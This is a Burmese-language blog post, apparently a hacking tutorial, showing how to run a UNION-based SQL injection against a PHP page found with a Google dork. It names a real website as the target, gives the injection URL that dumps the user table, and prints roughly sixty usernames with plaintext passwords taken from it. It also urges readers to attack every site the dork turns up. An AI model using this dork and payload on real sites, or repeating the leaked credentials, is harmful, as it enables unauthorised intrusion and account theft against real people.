WHMCS SQL Injection Vulnerability

WHMCS SQL injection နည္းေလးပါ။ အမ်ားစုကေတာ့ Sql Injection ထုိးရေတာ့မယ္ ဆုိရင္ စိတ္မပါတာမ်ားပါတယ္။                                ( ကြ်န္ေတာ္အပါအ၀င္ေပ့ါxx) ဒီေတာ့ဘာလုပ္လဲဆုိေတာ့ sql error page ကို၇ွာ တယ္ ျပီးေတာ့ Havji  နဲ ့ ထုိင္ ေမႊတယ္ သိတဲ့သူေတြလညး္သိမွာ ပါ ။ အခုမွသိတယ္ဆုိေတာ့လည္း မွတ္ထားလုိက္ၾကေပ့ါဗ်ာမပာုတ္ဘူးလား။
မသိတဲ့သူေတြအတြက္ကေတာ့ စာေမးပြဲျပီးတာနဲ ့တင္ေပးပါ့မယ္ဗ်ာ။ အခုေတာ့ whmcs sql injection နည္းေလးစလုိက္ရေအာင္ဗ်ာ။

inurl:"weblink_cat_list.php?bcat_id="

ကြ်န္ေတာ္ အကြ်မ္းက်င္ဆုံးက Dork ေရးျခင္းပါဘဲ။ (လမ္းၾကဳံၾကြားတာ ပာီး-xx)
အဲ့မွာ ကုလားဆုိဒ္ေတြ ပုံသုံေနပါတယ္။ အားမနာနဲ ့ကစ္သာ ကစ္ဗ်ာ ။ ကြ်န္ေတာ့ စာဖတ္ညီကိုေမာင္ႏွမေတြလည္း မဲမဲ ျမင္အကုန္ကစ္မယ္ထင္ပါတယ္။ အစမ္း အေနနဲ ့ဆုိဒ္ေလး တစ္ခု စမ္းျပသြားပါမယ္။

http://www.kroobannok.com/weblink_cat_list.php?bcat_id=21
ကိုသြားလုိက္ပါ။ injection ထုိးတတ္သူမ်ားကေတာ့ထုိးၾကပါ။
အုိေကေကာင္းျပီ ဘာဆက္လုပ္ၾကမလဲဆုိတာပါဘဲ။
www.someone.com/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user

ဆုိျပီး ထပ္ထည့္မွာျဖစ္ပါတယ္။
ဒီေတာ့
http://www.kroobannok.com/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat%28id,0x3a,username,0x3a,password%29,3,4+from+user

 အဲ့လုိ ျဖစ္သြားမယ္ဗ်ာ။ ပာုတ္မပာုတ္သြားၾကည့္ပါ။
1:kroobannok:kroobannok,2:kornkham:vfbLidhvo8e,4:natapop:123456789,5:digdug:2518,7:suwan:thedogbark,11:backdream:1188248,12:banbor:banbor01,13:mayuree:nokmayuree,14:ฅuชuบn:66002084,15:kittawitga:0875398576,16:bongu193:0895672085,17:jack82:441612,18:ju:123456,19:ruttaket:424144038,20:kob_samart:lk,ki5,21:krudoi_01:16092522,22:Udra:0819515829,23:julaju:292501,24:nirun-k:0898574530,25:chitlada:chitlada,26:โด:252418,27:anannop:3515190,28:sjrcom:sjr992,29:childwrite:chitnipa,30:chalor:supervi48,32:D_e-A_r:1234,33:Jaruneetui:01022509,35:krubua:23062505,36:060501:060501,37:ครูดอย:0711,38:lugkana:2222,39:tambr2:160904,40:krutop:431117,41:p_srisakul:232263,42:ruksunti:paramet,43:tannong:080707,44:Sherlocks:06111988,45:nurse:662512,46:MOMMAM:2501,47:komchan:12345671,48:yaikroo:1017,49:nok_thiwa:312520,52:thungsawan:04066075,53:bup:2511,54:avc4dptp:,55:tsadee:096236042,56:weerapath_:02101,57:jony:jonyjony,58:kiti2:25322,59:pramote:001122,60:3307:3307,61:elee:1234,62:prommalha@:123,63:overview:123456789,64:kung_woo.2:120
 ကဲ သင္သာ အကယ္လုိမ်ား sql injection မရတဲ့သူဆုိရင္ကြ်န္ေတာ္ေျပာသလို ကုဒ္ကုိအစားသြင္းသြားပါ အမ်ားစုကရပါတယ္။(ရမွာေပ့ါ နာစမ္းျပီးသားေတြေလ+)

တစ္ခုေတာ့ မွာခ်င္ပါတယ္ ကြ်န္ေတာ္က စမ္းျပသြားတဲ့ဆုိဒ္ကိုေတာ့မလုပ္ေစခ်င္ပါဘူး ။ ဘာလို ့လဲဆုိေတာ့ေနာက္လူေတြလည္း စမ္းလုိ ့ရေအာင္ပါ။ ethic စိတ္ဓာတ္ေလး ထားေပးေစခ်င္ပါတယ္။

အဆုံးထိ ဖတ္ေပးလို ့ေက်းဇူးအထူးတင္ပါတယ္။

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com